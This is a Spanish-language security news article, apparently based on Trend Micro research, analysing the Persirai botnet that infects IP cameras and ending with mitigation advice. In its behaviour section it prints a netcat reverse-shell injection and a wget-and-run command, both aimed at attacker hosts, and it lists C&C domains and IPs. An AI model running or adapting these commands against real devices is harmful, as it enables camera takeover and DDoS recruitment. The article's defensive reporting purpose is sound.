Persiraim, la nueva red botnet de Internet de las Cosas que apunta a las cámaras IP
Noticias de seguridad" Se ha descubierto una nueva botnet de Internet de Cosas, IoT, denominada Persirai, que está dirigida a más de 1.000 modelos de cámaras IP, Internet Protocol, basadas en diversos productos de Fabricantes de Equipamiento Original, OEM. Noticias de seguridad"
Este desarrollo viene pisando los talones a Mirai, un malware de puerta trasera de código abierto que causó algunos de los incidentes más notables de 2016 mediante ataques de denegación de servicio distribuidos, DDoS, que comprometieron a dispositivos de IoT como grabadoras de vídeo digital, DVR, y cámaras CCTV , así como a la botnet Hajime.
El equipo de Trend Micro ha detectado aproximadamente 120.000 cámaras IP que son vulnerables a Persirai, detectada por la compañía de seguridad como ELF_PERSIRAI.A a través de Shodan. Muchos de estos usuarios vulnerables no saben que sus cámaras IP están expuestas a Internet.
Esto hace que sea mucho más fácil para los autores que están detrás del malware obtener acceso a la interfaz web de la cámara IP a través del puerto TCP 81.
Comportamiento y Análisis
Las cámaras IP suelen utilizar protocolos Universal Plug and Play (UPnP), que son protocolos de red que permiten a los dispositivos abrir un puerto en el router y actuar como un servidor, haciéndolos objetivos altamente visibles para el malware de IoT.
Después de iniciar sesión en la interfaz vulnerable, el atacante puede realizar una inyección de comandos para forzar a la cámara IP a conectarse a un sitio de descarga mediante el siguiente comando:
· $(nc load.gtpnet.ir 1234 -e /bin/sh)
El sitio de descarga responderá con los siguientes comandos:
· busybox nohup sh -c “killall encoder ;wget http://ntp.gtpnet.ir/wificam.sh -O /tmp/a.sh ;chmod +x /tmp/a.sh ;/tmp/a.sh” > /dev/null 2>&1 &
Estos comandos descargarán y ejecutarán script shell maliciosos del dominio ntp.gtpnet.ir
La wificam.sh descargará y ejecutará los siguientes ejemplos, que se eliminarán después de la ejecución:
Una vez que las muestras se han descargado y ejecutado, el malware se elimina y solo se ejecutará en la memoria. También bloqueará el exploit zero-day apuntando a ftpupdate.sh y ftpupload.sh a /dev/null para evitar que otros atacantes apunten a la cámara IP de la víctima. Sin embargo, una vez que la cámara se reinicia, será de nuevo vulnerable al exploit.
La cámara IP afectada informará a los servidores C&C:
- load.gtpnet.ir
- ntp.gtpnet.ir
- 185.62.189.232
- 95.85.38.103
Después de recibir órdenes del servidor, la cámara IP comenzará a atacar automáticamente otras cámaras IP aprovechando una vulnerabilidad zero-day que se hizo pública hace unos meses. Los atacantes que explotan esta vulnerabilidad podrán obtener el archivo de contraseñas del usuario, proporcionándoles así los medios para realizar las inyecciones de comando, independientemente del grado de seguridad de la contraseña.
A continuación se incluye un ejemplo de una muestra de la carga útil:
La cámara IP recibirá entonces un comando del servidor C&C, indicándole que realice un ataque DDoS en otros equipos a través de inundaciones User Datagram Protocol (UDP). Cabe destacar que Persirai puede realizar ataques DDoS con el protocolo UDP (User Datagram Protocol) con paquetes SSDP sin simular una dirección IP.
El protocolo de puerta trasera se puede ver a continuación:
Las partes rojas indican la comunicación desde el servidor C&C a la cámara IP de la víctima. Contiene los comandos de ataque y la dirección IP y el puerto de destino DDoS.
Los servidores C&C descubiertos por Trend Micro utilizaron el código de país .IR. Este código específico de país es administrado por un instituto de investigación de Irán que lo restringe sólo a los iraníes. También se han encontrado algunos caracteres especiales persas utilizados por el autor del malware.
El fabricante de la cámara IP utilizada en la muestra afirmó que el firmware más reciente solucionó la vulnerabilidad, por lo que intentamos actualizar el firmware de la cámara IP. Sin embargo, el firmware indica que ya está utilizando la última versión.
Conclusión y mitigación
Aparte de ser el primer malware que puso en evidencia la seguridad de IoT, también observamos cómo la naturaleza de código abierto de Mirai le dio el potencial para actuar como la plantilla central sobre la que se construirá el futuro malware centrado en IoT.
A medida que Internet de las cosas gana tracción con los usuarios de a pie, los ciberdelincuentes pueden optar por alejarse de los servidores Network Time Protocol (NTP) and Domain Name System (DNS para ataques DDoS, concentrándose en dispositivos vulnerables -un problema compuesto por usuarios que practican laxas medidas de seguridad.
Un gran número de estos ataques fue provocado por el uso de la contraseña predeterminada en la interfaz del dispositivo. Por lo tanto, los usuarios deben cambiar su contraseña por defecto tan pronto como sea posible y usar una contraseña fuerte para sus dispositivos.
Sin embargo, como se ve en la presencia de la vulnerabilidad de robo de contraseña mencionada anteriormente, una contraseña fuerte por sí sola no garantiza la seguridad del dispositivo. Los propietarios de cámaras IP también deben implementar otros pasos para garantizar la protección de sus dispositivos de ataques externos. Además de utilizar una contraseña segura y fuerte, los usuarios también deben deshabilitar UPnP en sus routers para evitar que los dispositivos dentro de la red abran puertos a Internet externos sin ninguna advertencia.
La carga de la seguridad de IoT no depende únicamente del usuario, sino que también depende de los fabricantes, ya que deberían ser los responsables de garantizar que sus dispositivos son seguros y siempre están actualizados. En consecuencia, los usuarios deben asegurarse de que sus dispositivos siempre se actualizan con el último firmware para minimizar la posibilidad de que se exploten vulnerabilidades.
